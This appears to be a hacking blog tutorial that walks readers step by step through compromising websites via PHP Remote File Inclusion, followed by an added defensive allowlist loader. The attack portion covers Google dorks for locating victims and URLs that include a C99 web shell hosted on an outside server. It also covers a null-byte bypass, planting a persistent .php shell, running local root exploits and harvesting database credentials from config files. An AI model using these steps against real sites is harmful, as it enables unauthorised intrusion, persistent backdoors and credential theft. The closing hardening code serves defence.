Hello friends, today I am going to explain an advanced method of hacking websites: how to hack websites using Remote File Inclusion. As the name suggests, Remote File Inclusion is a technique where we insert a file (in hacking terminology called a shell) into the website and get admin rights. Let's discuss this website hacking technique in detail, so friends, read on…
What is Remote File Inclusion?

Remote File Inclusion is a method of hacking websites and getting admin rights on the server by inserting a remote file, usually called a shell (a shell is a graphical user interface file used for browsing remote files and running your own code on web servers), into a website. Its inclusion allows hackers to execute server-side commands as the currently logged-on user and to access all the server files. With these rights we can continue to use local exploits to escalate our privileges and get control over the whole server.

Which Websites are Vulnerable to Remote File Inclusion attack?

The first and most basic question that arises in the mind of new hackers is how to find websites that are prone to a remote file inclusion attack, and which basic vulnerabilities in a website we will target to hack the website and web server. The answer to these questions is quite simple.

Now let's start the step-by-step remote file inclusion method to hack websites:

Step 1: Finding the Vulnerable Websites

First of all we have to find a website that gets its pages using the PHP include() function and is vulnerable to RFI (Remote File Inclusion). The best technique is to find websites using Google dorks. Google dorks are simply queries that are used to identify specific search results.
I have already listed a lot of Google dorks in my previous post on hacking websites, so you can look them up here:

Step 2: Identifying Vulnerable Website

Websites that have a page navigation system similar to the one below:

http://target-site.com/index.php?page=PageName

Step 3: Checking Website is Vulnerable or Not

To check if the website is vulnerable to a remote file inclusion attack, we would try to include a website link instead of PageName, as shown below:

http://target-site.com/index.php?page=http://google.com

Now if the Google home page opens, then it is confirmed that the website is vulnerable to a Remote File Inclusion attack and we will continue our attack. If the Google home page doesn't open, we will try another website.

Step 4: Remote Inclusion of Shells

Now we know that the website is hackable, so we will include the shells into the website. There are a number of shells available online, but my favorites are C99 and r57 because of their extended functionality and features.

inurl:c99.txt

This will display many websites with the shell already up and ready to be included. For future use in analysis you can download these shells from here:

The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

Step 5: Adding Null Byte

Sometimes the PHP script on the server appends ".php" to the end of every included file. So if you included the shell, it would end up looking like "c99.txt.php" and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

Step 6: Vulnerabilities Database

In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be:

allinurl:.php?page=

This looks for URLs with .php?page= in them. This is only an example and you most likely won't find any vulnerable sites with that search.
You can try switching around the word "page" with other letters and similar. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems, and then search for websites that are running that vulnerable web application with a Google dork.

Step 6: If Attack Successful

If we succeed in getting the server to parse the shell, then we will see a screen similar to the following:

[Image: hacking websites using remote file inclusion]

The shell will display information about the remote server and list all the files and directories on it. From here we would find a directory that has read and write privileges and upload the shell, but this time as a .php file, so that in case the vulnerability is fixed, the hacker will be able to access it later on.

Step 7: Find Root Privileges on Server

Next we would find a way to gain root privileges on the system. We can do this by uploading and running local exploits against the server. You can find a list of such exploits on milw0rm. We could also search the victim server for configuration files. These files most of the time contain usernames and passwords for the MySQL databases and such.

That's all there is to hacking websites using the remote file inclusion method. I hope you all have liked it. And I am sure you all have a lot of questions regarding this, so don't hesitate to ask in the comments. I will try to clear all your queries.

How to Protect your Websites and Forums from Remote file inclusion attack?

As we are ethical hackers, I will also explain how webmasters can protect their websites from RFI attacks.
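One way a webmaster can close the hole described in Steps 2 to 5, as an added example that is not code from the original article: the include() pattern the attack depends on is shown in a comment, followed by a loader that only ever includes files named in a fixed allowlist. The page names, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example: allowlist-based page loader (all names are hypothetical).
// Vulnerable pattern the article relies on, shown for contrast only:
//     include($_GET['page'] . '.php');   // the visitor picks the include target

// Public page names mapped to local files. Nothing else can be included.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];
const PAGE_DIR = __DIR__ . '/pages';   // assumed layout: pages live in ./pages

/**
 * Resolve a user-supplied page name to a local file, or null if rejected.
 */
function resolve_page(string $requested): ?string
{
    // Exact-key lookup: URLs, null bytes and "../" sequences never match.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: the file must exist and resolve inside PAGE_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?page[]=x arrives as an array, so accept strings only; default to 'home'.
$requested = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'home';

$file = resolve_page($requested);
if ($file === null) {
    // Record the attempt for monitoring; encode it because it is attacker-controlled.
    error_log('rejected page parameter: ' . rawurlencode($requested));
    http_response_code(404);
    exit('Page not found');
}
include $file;
```

In php.ini, keep `allow_url_include = Off` (the default since PHP 5.2) so include() cannot fetch remote URLs even if a code path like the vulnerable one survives. The rejected-parameter log lines give defenders a signal that someone is probing the page parameter.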